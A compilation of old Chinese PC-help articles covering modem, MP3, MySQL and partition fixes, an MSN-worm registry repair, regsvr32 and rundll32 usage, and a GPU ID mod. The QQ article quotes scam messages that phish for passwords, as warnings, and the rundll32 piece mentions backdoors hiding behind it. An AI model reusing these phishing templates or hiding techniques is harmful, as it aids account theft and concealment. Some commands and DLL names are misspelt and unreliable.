    木马还可以利用系统的一些漏洞进行植入，如微软著名的IIS服务器溢出漏洞，通过一个IISHACK攻击程序即在把IIS服务器崩溃，并且同时在攻击服务器执行远程木马执行文件。因此，倘若怀疑中了木马，最好使用专业软件检测并清除。

作者：szgm
来源：金山毒霸安全资讯网


Mfm1992文件问题

《一键清理系统垃圾》

Mfm1992文件问题

    问：我的桌面上出现了一个名为Mfm1992的视窗图案的图标，路径是C:\Windows\Desktop，占用45056字节，请问它是什么文件？

    答：“Mfm1992”是中文输入法“智能ABC”的记录文件。你的电脑中出现“Mfm1992”文件是由于你使用了“智能ABC”输入法作为中文录入的方式，这也应该算是“智能ABC”输入法的一个Bug，该文件可以随时删除而不会影响系统，不必担心。


Modem无法正常拨号故障分析

《一键清理系统垃圾》

Modem无法正常拨号故障分析

    最近老是有朋友打电话来问我一些上网的问题，其中问得最多的就是无法正常拨号上网。我针对几个比较特殊的例子，总结出以下几个影响正常拨号的原因，希望能给碰到这些问题的朋友一些启发。
        1.如果是第一次上网，可能是Modem和串行口的设置有问题。仔细查看各项设置并改正，问题就可以解决了。如果还不能进行正常拨号，就请参考以下内容。
        2.如果你的Modem一直使用正常，突然罢工了，这种情况就比较复杂了，但大致上可以从以下几点考虑：
        （1）检查线路有无问题。接上一部电话听一下，有无正常拔号音，若拔号音不正常，可能是电话线路出现故障，检查一下电话线路。如拨号音正常，则可能是你在设置其它参数的时候不小心搞乱了Modem和串行口的设置，只要改回来就可以了。
        （2）如果是内置Modem的话，看看其设置是否与存在的串行口发生冲突。串行口3与串行口1共用中断4，串行口4与串行口2共用中断3。如果你的鼠标是接在串行口1上的话，最好是把内置的Modem设置在串行口4上，然后在“控制面板”中的“设备”管理内的端口选项中禁用串行口2，这样的话一般就不会再出现串行口与内置Modem抢中断的事情了。
        （3）想想看最近有无安装过什么软件或硬件，查看一下该软件或硬件有无与Modem发生资源上的冲突，尤其是内置Modem，很容易与其它设备发生资源冲突。若有的话，先试试通过设备管理器调整有冲突的硬件或软件的资源，再不行就重新安装Modem的驱动程序。若恢复正常则罢，否则只好先删除有冲突的软件或去掉有冲突的硬件，应该会没问题了。再不行的话，就只有重新安装Windows 98！
        （4）如果电话线路正常，参数设置也没错，那么最近有无雷击、闪电之类的现象。如果有，最好先拿你的Modem到你朋友的家里试一下，如果也不行，那么你的“猫”肯定是已遭雷击了。解决方法就是去换一只新Modem。
        3.除了以上那些软件和硬件的故障以外，还有以下的因素也可能会引起Modem无法正常拔号：
        （1）非正常的拔号音。这种问题在使用内部分机上网的电脑上比较常见，因为一些小的程控交换机的拔号音没有采用标准的频率，或者有一些交换机根本就是用音乐来作为拔号音。由于Modem无法正确识别这些拔号音，所以就提示无拔号音。如果是这样的话，你可以在“控制面板”中，双击“调制解调器”，然后单击“常规”标签，单击正在使用的调制解调器，单击“属性”，在“连接”标签中取消“拔号前等待拨号音”前复选框中的选中符号，让Modem不检测拨号音，直接进行拨号连接。
        （2）使用内部分机上网的话，千万别忘了在电话号玛前加上拨外线时需加的前缀，如“0”或“9”等，视具体情况而定。方法很简单，只要在拨外线前缀与电话号码间加上一个空格就可以了，如拨163则为“0　163”，Modem在拨“0”后再等待交换机接通外线，当检测到外线拨号音以后，Modem就会继续拨出“163”连通网络。
        （3）对于一些外置Modem，在使用了一段时间后就会出现断线等原因，除了电话线路的因素外，其实Modem的电源部分也有很大的影响。笔者以前就为了省钱曾使用过一个杂牌的外置Modem，每次上网大概二十分钟就会断线，而当断线出现后，再拨号，没过几分钟就又会断线。一开始还以为是线路问题，但仔细想想，就算是线路问题的话，也不至于每次都会在使用过一段时间后才出现故障，而且后来发现环境温度越高越容易出现断线，所以怀疑是Modem的散热有问题。打开Modem后，发现Modem的电源部分是由外接变压器输入交流电压的，经过机内整流及滤波电路后，由稳压集成块7805向电路提供+5V的直流电压。开机观察了一会儿后发现，7805发热得很历害，断线的时候量其输出电压，只有二点几伏，于是就把它换成功率较大的7805，此后，就再也没出现过以前那种无缘无故断线的情况了。

作者：郑云


MP3常见故障解决

《一键清理系统垃圾》

MP3常见故障解决

乱码爆音别急
在使用MP3随身听的过程中，总会碰到这样或者那样的问题。而实际上90%以上MP3故障问题都是比较简单的问题，完全可以通过自己动手来解决。 这次为大家带来下面的文章，希望能为大家解决问题带来方便。
一、播放的音乐名称是乱码的现象
解决方法：这个问题主要和你的MP3音乐文件附带的文件信息不正确有关，解决的方法就是直接用WINAMP等播放工具将音乐文件信息去除，就是右键点击播放列表中的音乐文件，选“音乐文件信息”，在出现的对话框中将ID3v1和ID3v2项目中的文件信息全部清空就行。
二、用户误用Windows的格式化程序对MP3进行格式化，此时开机时屏幕上会显示“!Media Error”，随后会自动关机。
解决方法：只要重新用的驱动程序进行格式化就可以了。
三、机器开启不了
解决方法：就目前来看，当机器开启不了时90%以上的原因是由于用户的各类误作导致MP3内部的固件（Firmware）损坏造成的。只要对其进行重新格式化并写入Firmware就可。可将电池拿下，按住播放键不放，连上电脑，运行驱动程序，然后进行格式化及固件升级即可。
四、用户用光盘自带的驱动进行升级后，只能显示繁体中文
解决方法：上网下载简体中文的固件，然后照上面的步骤重新用的驱动程序进行升级并格式化就可以了！
五、用户升级到一半，因为意外原因突然终止，导致机器无法开启
解决方法：将电池拿下，按住播放键不放，连上电脑，运行驱动程序，然后进行格式化及固件升级即可。
六、用户反映机器会自动关闭
解决方法：菜单中有一选项为关闭设置，可设置当长时间不用时，机器自动关闭。
七、播放时，音乐出现断断续续的停顿
解决方法：1、机器感染病毒：请重新格式化机器。 2、歌曲有问题:可能是歌曲压缩格式不同，请更换歌曲试一下。
有的是由于在从电脑下载文件到MP3时，USB接口的接触不良引起的，建议重新插拔几下，或更换另一个USB接口下载，或更换USB延长线，或换一台电脑下载试试看。（没有办法的办法）
八、为什么我的MP3出现英文“Error!Reformat Internal media with”？
解决方法：1：用户用了FAT32的文件系统格式化MP3播放器。2：用了与其不配套的驱动程序Firmware DownLoad您的MP3。
第一种情况可以用最新的驱动软件所附带的刷新工具重新刷新一下MP3即可解决该种情况。
九、MP3播放器出现开机LOGO后不能播放？
解决方法：把MP3机和计算机连接，用驱动程序附带的格式化工具或更新程序方式重新刷新一下MP3即可解决该种情况。
十、有的MP3格式文件在MP3播放器上能够播放，有的不能播放？
解决方法：出现有的MP3格式能够播放，有的不能播放的主要原因是它们的压缩格式层次不一样的。普遍MP3只支持用第三层压缩的MP3，而用第一、二层压缩的只能在电脑中播放，在MP3播放器中不能播放。您也可以去网上下载一个MP3转换工具把它转换成标准的MP3格式。
十一、MP3机只能存储数据，而不能播放MP3文件，或没有声音。
解决方法：1、音量太小，请调节音量。2、内存格式化的系统不正确，请用“FAT"系统重新格式化。这种情况很有可能使用其他格式的文件系统格式化了MP3。mp3一般默认的文件系统为FAT文件系统，而用其他格式的文件系统格式化后很有可能不能播放，只能作U盘使用。
十二、MP3机的容量比实际的少？
解决方法：1、有方案程序在内，不同的方案占用的空间不同，可能会有一定的出入。 2、是否有隐藏文件，将查看模式更改为显示所有文件后重新查看一下属性。还有就是MP3的内核程序存储在存储器里面。
十三、找不到盘符
解决方法：1、驱动没安装或使用不当：在WIN98上需要安装驱动重新启动电脑后，才可插上MP3使用；安装后，由于WIN98刷新设备时间太长，不重新启动电脑的情况下，大多情况是找不到的；如安装程序不对应或没安装需要找到对应的驱动重新安装。
2、接触不良：如连线松动或插的不到位，都容易引起接触不良，找不到设备，重新插拔连线如还不行，则需要拆机器焊接接口处，最好发回厂家由厂家解决。
3、由于连线:有些mp3为了控制耗电量，降低了机器的功率，可能会由于连线而造成功率不足找不到设备，可直接插在电脑上；已有可能因为连线不通而造成，可更换连线。
4、开关机状态不同：有的需要开机连机，有的需要关机连机。
5、检查PC机的BIOS是否能使（正确为：USB ENABLED,不正确为：USB DISABLED)。
6、电脑软件混乱，造成IO地址分配冲突。
十六、按键问题
解决方法：1、检查“HOLD”开关是否置于锁键位置，将其置于非锁键位置。2、在歌曲播放或停止时，相同按键功能不一样，请翻看说明书或多试一下。3、如安键落，请将机器送维修站维修。
十五、不开机的现象
解决方法：1、丢程序：在MP3上下传输数据时，不正确插拔机，容易出现丢程序，使得机器不开机，避免此现象的方法是点击移动存储标记属性中的停止使用，在电脑提示可以拔下移动存储时正确拔下MP3；解决方法有从网上下载修补程序，安装在电脑上后，使用其程序对机器进行格式化，如解决不了，可发回厂家重新写程序。
2、接触不良：由于平时经常更换电池，容易引起电池弹簧松动，导致接触不良，线路不通，无法开机，避免方法是平时换电池时，轻拿轻装；解决方法是打开机壳，焊接一下线路松动处。
3、线路板或方案出现问题：此种情况将机器发回厂家由其解决。
4、是否安装电池？是否装反？是否耗尽？
十六、自动关机的现象
解决方法：1、电池不足：更换电池即可解决。2、程序设置：在极其电源管理中，设定了自动关机的时间，调整即可。3、无意碰撞：有些机器，关机键设定时间太短，无意间碰到引起关机，解决方式是妥善放置避免与其它东西碰撞。
十七、持续死机
解决方法：1：有保修赶紧送去。2：没有的话，当U盘用……


MSN小尾巴致系统不能登陆的修复

《一键清理系统垃圾》

MSN小尾巴致系统不能登陆的修复

    msn小尾巴（就是最近两天广为人知的Funny.exe）病毒致系统不能登陆的修复方法

    msn小尾巴（Troj.MSNTail）病毒攻击后，会修改系统注册表关键键值，会导致重启系统时不能正常登陆。请大家采用以下方案，适用于win2k\winxp\win2003各版本，而不必考虑分区类型。

    1. 用Win2K/XP(对应自己的系统)安装光盘引导系统.

    2. 按”R”踺选择用控制台修复系统.

    3. 选择要修复的系统路径，通常只有一个分区，按数字1，回车，再输入管理员密码（很多win2k\xp的管理员口令为空，如果你忘了，试试直接回车）

    4. 执行CD SYSTEM32，进入C:\WINDOWS\SYSTEM32(win2k的是winnt\system32)

    5. 执行 COPY USERINIT.EXE USERINIT32.EXE

    6. 重新启动计算机升级金山毒霸到最新版本杀毒

    7. 运行regedit，找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon，双击编辑右边窗口的Userinit键值，该键值正常为C:\WINDOWS\system32\userinit.exe，被病毒修改为C:\WINDOWS\system32\userinit32.exe,编辑时，去掉userinit32.exe的32就可以了。

    8. 完毕

     对于win98系统，rundll32.exe被病毒覆盖了，只能用备份恢复，可以启动系统到安全模式，运行sfc，从98安装盘中提取这个程序保存到windows\system32目录。


如何在win2000下安装mysql

《一键清理系统垃圾》

如何在win2000下安装mysql

安装选默认目录就可以了 c:\mysql
     把 c:\mysql\my-example.cnf copy 为 c:\my.cnf

     要修改的自己去看看吧，很简单的

     把 c:\mysql\libcygwinb19.dll copy 到 winnt\system32

     启动 mysql

     c:\mysql\bin\mysqld-shareware --install
     net start mysql

     启动啦

     更改 root 的 password

     C:\mysql\bin\mysql mysql
     mysql> UPDATE user SET password=PASSWORD('your password') WHERE user='root';
     mysql> QUIT
     C:\mysql\bin\mysql\admin reload

     去看看行了没有？
     C:\mysql\bin\mysqlshow

     在这里应该显示：

     +-----------+
     Databases
     +-----------+
     +-----------+
     mysql
     Databases
     +-----------+
     mysql
     test
     +-----------+

     看到这些信息这一步就OK了

     再来:
     C:\mysql\bin\mysqlshow --user=root --password=your password mysql

     在这里应该显示：

     Database: mysql
     +--------------+
     Database: mysql
     +--------------+
       Tables
     +--------------+
     columns_priv
     db
     host
     tables_priv
     user
     +--------------+

     看见就行了。

     C:\mysql\bin\mysqladmin version status proc

     没有问题就应该可以看到这些信息：

     mysqladmin　mysqladmin　　Ver 8.0 Distrib 3.22.32, for Win95/Win98 on i586
     TCX Datakonsult AB, by Monty

     Server version　　　　　　　　　　3.22.32-shareware-debug
     Protocol version　　　　　　　　10
     Connection　　　　　　　　　　　　localhost via TCP/IP
     TCP port　localhost via TCP/IP
     TCP port　　　　　　　　　　　　　　　　3306
     Uptime:　　　　　　　　　　　　　　　　　1 hour 29 min 30 sec

     Threads: 1　　Questions: 72　　Slow queries: 0　　Opens: 16　　Flush tables: 1　　Open tables: 0　　Memory in use: 　　 16423K　　Max memory used: 16490K
     Uptime: 5370Threads: 1　Threads: 1　　Questions: 72　　Slow queries: 0　　Opens: 16　　Flush tables: 1　　Open tables: 0　　Memory in use: 16423K　　Max memory used: 16490K

     +----+------+-----------+----+---------+------+-------+------------------+
     Id User Host　　　 db Command Ti State Info　 State Info
     +----+------+-----------+----+---------+------+-------+------------------+
     35 ODBC localhost 　　 Query　 0　　　　　　 show processlist
     +----+------+-----------+----+---------+------+-------+-----------------

     接着，用show databases命令可以将安装的数据库列出来：

     mysql> show databases;

     你就可以看到：

     +----------+

     Database

     +----------+

     mysql ---

     test ---

----------------------------------------------
雨湿了我的头发，我用手轻轻拨弄了一下。
心情是那么的舒畅，在雨中我找回了真实的自己。漫步于雨中，是我最好的消遣寂寞方法。
我能想到最浪漫的事，就是和你一起慢慢变老。


NTFS分区格式转化成FAT32的几种方法

《一键清理系统垃圾》

NTFS分区格式转化成FAT32的几种方法

    一般转换NTFS磁盘格式为FAT32磁盘格式，经常使用Partition Magic工具，其实不用它照样可以，而且速度更快，安全性更高。

    注意两点：1.原有数据转移到其他分区，格式化完成后再拷贝回来；2.格式化窗口中，格式化类型选择“FAT32”。

    系统所在分区NTFS格式的转换要麻烦得多，下面是笔者从实验中得到的方法。

    硬盘分区表恢复法

    由于在硬盘分区表的lc2h、ld2h、le2h、leeh位移处存放的是四个分区的格式类型，因此可以利用KV3000、Disk Cenius等工具软件备份、恢复硬盘分区表的方法来恢复(注意：必须在FAT32转换为NTFS格式之前备份硬盘分区表)。具体步骤如下：

    1.KV3000备份、恢复

    在FAT32格式下进行备份。将KV3000密钥盘引导系统，键入KV3000/b，回车，插入一张干净的软盘，按Y键，硬盘分区表数据hdpt.dat即刻备份至该软盘。要恢复NTFS为FAT32格式，将KV3000密钥盘引导系统，键入KV3000/hdpt.dat，回车，硬盘分区表信息恢复至硬盘中，重启即可格式化了。

    2.Disk Genius备份、恢复

    具体方法如下：运行Disk Genius，“工具”菜单下选取“备份分区表”，弹出“备份到文件”对话框，在“请输入文件名”栏内输入备份的文件名及路径(系统默认的路径为软盘，可以修改为其他路径，文件名最好不要修改，特别是文件名后缀不要更改)，确定，退出即可。以后要转换NTFS为FAT/FAT32格式，则必须用DOS软盘引导系统恢复该分区表，进入Disk Cenius目录，键入Mouse.com,回车，加载鼠标驱动程序方便操作，再键入Diskgen，回车，进入Disk Genius图形化程序界面，鼠标选取“工具”菜单下“恢复分区表”选项，在“从备份恢复分区表”窗口“请输入文件名”栏内输入备份的文件名及路径确定，存盘，退出，重启格式化即可。

    以上两种方法转换速度快，但首先一定要在转换FAT32为NTFS格式之前做好硬盘分区表的备份；其次备份和转换之前，要把将要转换的分区表上的数据转移到其他的地方，以确保安全!

    Win2000/XP安装光盘转换法

    利用Win2000安装光盘全新安装Win2000。安装过程中，选择NTFS分区，然后选择“格式化”、“用FAT32格式化”，完成这一步后，强行退出安装程序，重启系统，即可发现该分区已经是FAT格式了(倘若该分区大于2GB，则为FAT32格式)。

    最后再次强调一点：转换分区前，为转换时的速度考虑，更为转换时硬盘上数据的安全考虑，一定要做好重要数据的备份！


QQ号码被盗原因分析

《一键清理系统垃圾》

QQ号码被盗原因分析

    为什么QQ的密码那么容易失窃呢，其实，从0220版本开始我们就采用不可逆算法对本地密码进行了加密，所谓不可逆算法意思就是哪怕是我们的程序设计人员拿到了你存储的加密密码也无法从它反向推算出你的明文密码，因此这方面QQ软件本身并不存在任何缺陷，号码被盗，并不是QQ软件本身的问题造成的。解决这一问题，关键还是要大家明白被盗的原因，并在实际使用中注意注意防护。 号码被盗主要原因包括以下几点：

     1． 密码过于简单

    现在网上流传的一些QQ密码猜解器其实是采用穷举法来一个个推算你的密码的，当你的密码长度很短或者太简单的时候，就容易被这些猜解器在短时间内猜解出来。而只要你的密码长度大于8位而且大小写混杂，再加上一些符号的话，这些猜解器大概要花上几个月甚至几年才有可能算出你的密码，所以我们建议您在设置自己的QQ密码时一定要把它设置得足够长并且足够复杂，绝对不要用简单的数字如生日或者电话号码等来作为自己的密码。 您在设置完密码后可以到腾讯网站申请密码保护功能以保证您的号码不被他人盗用。

    2． 木马

    Internet上的"木马"是一种病毒程序，这些小程序往往会附着在一些黑客工具软件上或其它软件上，很多网友由于好奇或者为了报复他人就去下载一些来路不明的炸弹、断线、猜密码等工具，这些东西有可能被人加了木马程序，当你正在享受炸别人黑别人的快感的时候殊不知埋伏在里面的木马已经偷偷潜伏在你的计算机里，只要里外一接应，你电脑中的一切都会毫无保留地奉献给别人，甚至木马的控制者在愿意的时候可以象烧掉特洛伊城一样破坏你的电脑。而且，一些新近流行的木马可能会更加另人难于防范，其隐蔽性在于它可以截获你所有的键盘输入，并将其保存结果定时发到指定地址的计算机或者发邮件到某个邮件地址，由于在键盘输入这一第一步你的操作就被木马偷听到了，所以即使QQ本身做的再怎么安全也是无济于事了。 　　QQ本身的保密性其实是很强的，只要网友在使用的时候多加防范，不要下载来路不明的软件，尤其是黑客类软件你的QQ号码还是很安全的，当然我们也会不断完善QQ的密码机制，使得用户号码即使被盗也有相应的途径找回。在最大程度上保护用户的利益不受损失

    3． 被骗号

    有人冒用公司的名义，向用户发出中奖通知，要求用户提交个人密码等资料，或者以其个人名义向你送出号码等礼品，借机骗取您的密码。对于此类行为，大家一定要提高警惕，不要认为天下又掉馅饼了。 在此提醒大家：公司不会要求网友通过EMAIL方式或者QQ消息提供QQ密码等个人资料，所有相关的资料填写只会在腾讯公司网站上进行。请各位网友注意识别以中奖等名义骗取密码的行为。

以下列举典型案例，请大家注意识别。

案例一、利用EMAIL冒充公司通知中奖，进行诈骗。

欺骗邮件类似以下内容(打X的地方为原文隐藏),请大家切记不要上当！

From: "truename"
To:
Sent: Tuesday, October 10, 2000 7:08 PM
Subject: 腾讯关于xxxxx获奖通知 >

(xxxxx)QQ幸运儿： > 恭喜！！！您已经成为QQ在线网友齐抽奖的中奖用户。 您将获赠精美T恤1件，并有机会得到NOKIA 7110手机1部。 腾讯公司(http://www.tencent.com)

注：奖品是以邮寄方式寄出，请您认真填写以下资料。如果填写错误，将被作为自动放弃获奖机会处理。 > > QQ号码： > 密码： > 姓名： > E-mail地址： > 身份证号码： > 通讯地址： > 联系电话： > 邮编：

案例二、发送QQ消息或发mail，通知所谓的“腾讯公司送号码”进行诈骗。

发送QQ消息内容类似如下：

2001-01-01 19:56:23 邮递QQ
亲爱的QQ用户： 你好，你的号码已经被幸运的抽中为滕讯用户中奖号码，现送你一号码，8806088。密码为o8806088 请尽快登陆和修改密码。 谢谢你对滕讯公司的支持！

发mail内容类似如下：

你好，恭喜你成为我们腾讯第52位幸运者，606210密码是123456 > 这个号码是我们送给你的礼物 ，希望你能够收下，谢谢 。如果收下，请马上更换密码，最好是换成你现在用的QQ密码，因为你的中奖号码和我们给的奖品号码是有纪录的 那样以防丢失，如果不按我说的做，丢失的话，我们概不负责，谢谢！ 请不要和你身边的人说，那样我们的工作就很难进行！如果改完密码和我说一下，我还要找别的幸运者！谢谢！

行骗伎俩：此人首先把要赠送的号码进行“号码保护”，然后假意赠送给他人，得到号码的网友，大多数都把该号码的密码改为自己现在正在使用的已有QQ的密码。骗子再去利用“取回密码”功能获得赠送的号码的密码，进而取得被骗用户的其他号码的密码。

作者：tencent
来源：tencent


Quadro4完全硬件改造之MX440篇

《一键清理系统垃圾》

Quadro4完全硬件改造之MX440篇

显卡：MSI MX440-SE
原因：SOFTQUADRO4改卡成功了，性能不错，可是后来发现不能HIBERNATE休眠！以为是BUG，后来RIVATUNER开发者说就是这样的！靠！逼得我非硬改不可！
目的：将MX440改造为 QUADRO 550XGL
原理：先来看GF4系列ID对照表：（可以在驱动源文件nv4_disp.inf中查出来）
MX460的ID为0170
MX440的ID为0171
...
550XGL的ID为0178
MX440和550XGL最关键的区别就是最后一位1和8地区别，换成二进制就是0001和1000，稍微有点电路经验的人就会联想到1、0分别代表高、低电位，实际上nvidia系列显卡就是这样做的，它通过检测ROM芯片的其中4个引脚的高低电位来判别ID号！
实施：好，原理知道了，开始动手。先找出0001的1是板上哪个电阻？1表示电阻接高电位，再想想以前GF2改造中提过的检测ID是ROM的18,19脚，可能还没变。先看看这两个引脚的电阻怎么接的，用万用表一量18脚接高，19脚接地，看来18脚就是我们要找的引脚！马上动手，将18脚置高电位的电阻R727拆下，换到接地的R726。 这样一来，显卡ID应该是0170，对应的显卡型号应该是MX460，装上电脑试试，进入系统后果然说检测到MX460！哈，第一步走对了！现在要做的是把0000改成1000了。这个1是那个电阻呢？刚刚18脚接的电阻是R726/727，对应最后一位的0/1；19脚接的电阻是R728/729，对应最后面的倒数第二位的0/1；这样算过去R730/731对应的是第三位的0/1，那第四个0/1应该对应的是R732/733! 如果真的如此，那R732应该有个10k电阻，而R733空着，实际查看后，确实如此！好，马上把电阻从R732换到R733，装上电脑，进入系统，检测到新硬件......QUADRO 550XGL!
总结：MSI MX440 改成 QUADRO 550XGL只需要移动两个电阻：R727-> R726, R732->R733.
【提示】
1. 建议找使用公板PCB设计的显卡来改，如MSI


Regsvr32 用法和错误消息的说明

《一键清理系统垃圾》

Regsvr32 用法和错误消息的说明

对于那些可以自行注册的对象链接和嵌入 (OLE) 控件，例如动态链接库 (DLL) 文件或 ActiveX 控件 (OCX) 文件，您可以使用 Regsvr32 工具 (Regsvr32.exe) 来将它们注册和取消注册。

Regsvr32.exe 的用法

RegSvr32.exe 具有以下命令行选项： Regsvr32 [/u] [/n] [/i[:cmdline]] dllname

   /u - Unregister server<BR/>
   /i - Call DllInstall passing it an optional [cmdline];
        when used with /u calls dll uninstall
   /n - do not call DllRegisterServer; this option must
        be used with /i

当您使用 Regsvr32.exe 时，它会尝试加载该组件并调用它的 DLLSelfRegister 函数。如果此尝试成功，Regsvr32.exe 会显示一个指示成功的对话框。如果此尝试失败，Regsvr32.exe 会返回一条错误消息，其中可能会包括一个 Win32 错误代码。要查看 Win32 错误代码的列表，请参见下面的 Microsoft Web 站点：
http://msdn.microsoft.com/library/en-us/netdir/adsi/win32_error_codes.asp

例如，要手动注册 Sample.ocx ActiveX 控件，请在 MS-DOS 提示符处键入以下命令：
c:\regsvr32.exe sample.ocx

Regsvr32.exe 错误消息

以下列表介绍了 RegSvr32 错误消息和可能的原因。

Unrecognized flag:/invalid_flag

键入的标志或开关组合无效（请参阅本文中的“Regsvr32.exe 的用法”一节）。

No DLL name specified.

未包括 .dll 文件名（请参阅本文中的“Regsvr32.exe 的用法”一节）。

Dllname was loaded, but the DllRegisterServer or DllUnregisterServer entry point was not found.

Dllname 不是 .dll 或 .ocx 文件。例如，键入 regsvr32 wjview.exe 就会生成该错误消息。

Dllname is not an executable file and no registration helper is registered for this file type.

Dllname 不是可执行文件（.exe、.dll 或 .ocx）。例如，键入 regsvr32 autoexec.bat 就会生成该错误消息。

Dllname was loaded, but the DllRegisterServer or DllUnregisterServer entry point was not found.

Dllname 可能未导出，或者内存中可能有损坏的 Dllname 版本。请考虑使用 Pview 来检测该文件并删除它。

Dllname is not self-registerable or a corrupted version is in memory.

例如，键入 regsvr32 icwdial.dll 后就会返回该错误消息，因为 Icwdial.dll 文件不能自行注册。如果您怀疑内存中有损坏的 Dllname 版本，请尝试重新启动计算机，或重新提取该文件的原始版本。如果您运行的是 Windows NT，可能需要使用 Microsoft Windows NT Server 4.0 资源工具包 中的 Kill 或 Pview 工具。有关其他信息，请单击以查看以下 Microsoft 知识库文章：
197155 如何终止孤立进程

OleInitialize failed (or OleUninitialize failed).

Regsvr32 必须先初始化 COM 库，然后才能调用所需的 COM 库函数并在关闭时撤消对该库的初始化。如果对 COM 库进行初始化或撤消初始化的尝试失败，就会出现这些错误消息。例如，Ole32.dll 文件可能已经损坏，或者其版本有误。

LoadLibrary("Dllname") failed.GetlastError returns 0x00000485

在 Winerror.h 中，0x00000485 = 1157 (ERROR_DLL_NOT_FOUND)，表示“找不到运行该应用程序所需的某个库文件”。例如，键入 regsvr32 missing.dll 后，如果找不到 Missing.dll 文件，就会返回该错误消息。

LoadLibrary("Dllname") failed.GetLastError returns 0x00000002

在 Winerror.h 中，0x00000002 = 2 (ERROR_FILE_NOT_FOUND)，表示“系统找不到指定的文件”。换言之，系统找不到相关的 DLL。例如，如果键入 regsvr32 icwdial.dll，而此时缺少 Tapi32.dll（依赖项），就会返回该错误消息。

LoadLibrary("dskmaint.dll") failed.GetLastError returns 0x000001f

在 Winerror.h 中，0x000001f = 31 (ERROR_GEN_FAILURE)，表示“附加到系统上的设备不能正常工作”。如果您尝试注册 Win16 .dll 文件，就会发生此现象。例如，键入 regsvr32 dskmaint.dll 会返回该错误消息。

DllRegisterServer (or DllUnregisterServer)in Dllname failed.返回代码是：字符串

在 Winerror.h 中搜索字符串。
Regsvr32.exe 和依赖项
RegSvr32.exe 依赖于 Kernel32.dll、User32.dll 和 Ole32.dll 文件（在 Windows NT 中，还依赖于 Msvcrt.dll 和 Advapi32.dll 文件）。Regsvr32.exe 会加载您尝试注册或撤消注册的文件及其所有依赖项。如果缺少必需的文件或者它们已损坏，该进程可能会失败。

您可以使用 Depends.exe 来确定您尝试注册或撤消注册的文件的依赖项。在 Microsoft Windows 98 资源工具包 和 Microsoft Windows NT 4.0 资源工具包 支持工具中都提供了 Depends.exe。
247024 Tools Included with the Microsoft Windows 98 Resource Kit


Regsvr32使用方法

《一键清理系统垃圾》

Regsvr32使用方法

    使用过activex的人都知道，activex不注册是不能够被系统识别和使用的，一般安装程序都会自动地把它所使用的activex控件注册，但如果你拿到的一个控件需要手动注册怎么办呢？如果修改注册表那就太麻烦了，在windows的system文件夹下有一个regsvr32.exe的程序，它就是windows自带的activex注册和反注册工具。它的用法为：

    “regsvr32 [/s] [/n] [/i(:cmdline)] dllname”。其中dllname为activex控件文件名，建议在安装前拷贝到system文件夹下。

    参数有如下意义：

    /u——反注册控件

    /s——不管注册成功与否，均不显示提示框

    /c——控制台输出

    /i——跳过控件的选项进行安装(与注册不同)

    /n——不注册控件，此选项必须与/i选项一起使用


Regsvr32命令修复系统故障

《一键清理系统垃圾》

Regsvr32命令修复系统故障

Regsvr32命令是 Windows 系统提供的一个实用工具，它用来向系统注册控件或者卸载控件，利用该命令，可找回系统丢失的功能。Regsvr32命令以命令行方式运行，其命令格式为： Regsvr32 [/u] Filename, Filename是控件文件名，不带参数 u 就是注册控件，带参数 u 就是卸载控件。
l. 恢复图片预览功能： Windows XP的图片预览功能，对应的控件文件为 thurnbvw.dll。 如果该功能损坏，可单击“开始”一“运行” , 在“打开”框中输人：" Regsvr32 Thurnbvw. dll" ，单击“确定”执行命令，这时就会弹出提示框： " DllRegisterServer in Thumbvw.dll succeeded." ，这表明控件注册成功。重新启动电脑，WindowsXP 的图片预览功能便恢复了。
    2. 恢复ZIP功能：Windows XP 系统提供了ZIP功能，虽然功能不算强大，但不需要第三方软件就可打开ZIP文件，而且可以把ZIP压缩文件当作文件夹使用，也算是比较方便、实用的功能。如果该功能损坏，可在运行框中执行“Regsvr32 ZIPfldr.dll”命令，然后重新启动电脑即可恢复。
3. 恢复IE新窗口打开超级链接功能：在IE中有两种超级链接，一种是在当前页面跳转的链接，另一种是弹出新窗口的链接，对第一种链接也可按住Shift键在新窗口中打开。很多人都遇到过不能在新窗口打开链接的麻烦事儿，这个问题也是因控件注册信息丢失引起的。解决办法是：在运行框中分别执行三个命令：“Regsvr32 Actxprxy.dll ”、“Regsvr32 Shdocvw.dll”、 " Regsvr32 Oleaut32.dll ”。一这三个控件注册成功后，重新启动电脑， IE 就恢复正常了。
    4. 恢复FSO功能：现在有很多人利用自己的电脑建论坛、网站，论坛或者动态网站程序都可进行在线文件管理，管理员通过页面就可操作文件，但经常有人反映自己的论坛、网站不能在线管理文件，这是因为服务器的FSO功能没有开通或者出现故障，解决办法是：在服务器的运行框中执行“Regsvr32 Sorrun.dll " ，最后重启服务器即可开通／恢复FSO功能。
    5. 恢复在线升级功能：在Windows的“开始”菜单的顶端，有一个“Windows Update”项，可以快捷的对系统进行在线升级打补。但有时会发现无法进行在线升级，要解决这个故障，只要在运行框中执行 " Regsvr32 Wupdinfo.dll " ，重启电脑即可解决。


RUNDLL32.EXE 是什么程序

《一键清理系统垃圾》

RUNDLL32.EXE 是什么程序

    Rundll32.exe是什么？顾名思意，“执行32位的DLL文件”。它的作用是执行DLL文件中的内部函数，这样在进程当中，只会有Rundll32.exe，而不会有DLL后门的进程，这样，就实现了进程上的隐藏。如果看到系统中有多个Rundll32.exe，不必惊慌，这证明用Rundll32.exe启动了多少个的DLL文件。当然，这些Rundll32.exe执行的DLL文件是什么，我们都可以从系统自动加载的地方找到。

    现在，我来介绍一下Rundll32.exe这个文件，意思上边已经说过，功能就是以命令行的方式调用动态链接程序库。系统中还有一个Rundll.exe文件，他的意思是“执行16位的DLL文件”，这里要注意一下。在来看看Rundll32.exe使用的函数原型：
    Void CALLBACK FunctionName (
    HWND hwnd,
    HINSTANCE hinst,
    LPTSTR lpCmdLine,
    Int nCmdShow
    );

    其命令行下的使用方法为：Rundll32.exe DLLname,Functionname [Arguments]
    DLLname为需要执行的DLL文件名；Functionname为前边需要执行的DLL文件的具体引出函数；[Arguments]为引出函数的具体参数。
略谈Rundll32.exe的作用　(我是菜鸟)

    常用Windows9x的朋友一定对Rundll32.exe和Rundll.exe这两个档案不会陌生吧，不过,由於这两个程式的功能原先只限於在微软内部使用，因而真正知道如何使用它们的朋友想必不多。那么好，如果你还不清楚的话，那么就让我来告诉你吧。
    首先，请你做个小实验（请事先保存好你正在执行的程式的结果，否则...）：点击“开始－程式－Ms－Dos方式”，进入Dos视窗，然後键入rundll32.exe user.exe,restartwindows，再按下回车键，这时你将看到，机器被重启了！怎么样，是不是很有趣？
